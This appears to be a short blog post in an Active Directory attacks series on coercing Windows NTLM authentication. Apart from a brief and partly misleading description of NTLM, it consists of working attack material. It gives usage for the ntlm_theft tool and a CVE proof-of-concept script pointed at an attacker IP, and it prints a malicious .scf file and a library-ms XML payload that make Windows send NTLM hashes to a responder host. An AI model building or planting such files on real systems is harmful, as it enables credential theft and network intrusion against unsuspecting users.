Post

Force NTLM (*.scf)

Posted Updated
Preview Image
By
1 min read
Force NTLM (*.scf)

Force NTLM Authentication with Windows

  • To force NTLM authentication in Windows, configure the “Network Security: LAN Manager authentication level” policy to enforce NTLMv2 usage.
  • NTLM (New Technology LAN Manager) is a suite of Microsoft security protocols used to authenticate users, provide data integrity, and ensure confidentiality in Windows networks.
  • It is a challenge-response authentication protocol, meaning it verifies user identity without transmitting the password over the network.

Tools

Repo link:- ntlm_theft

Usage:-

1

python3 ntlm_theft.py -g all -s Attacker_IP -f file_Name    # Generate all files

Repo link:- cve poc

1

python3 scf-cve.py     # It's create a .zip file

Resources

Exploit Demo

.scf File

1
2
3
4
5
6

[shell]
Command=2
IconFile=\\responder.local\share\pwn.ico

[Taskbar]
Command=ToggleDesktop

2025 CVE (Exploit.zip)

1
2
3
4
5
6
7
8
9
10

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\responder.local\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
AD- Attacks
ntlm_auth force_auth scf file attack ntlm force ntlmv2 capture
This post is licensed under CC BY 4.0 by the author.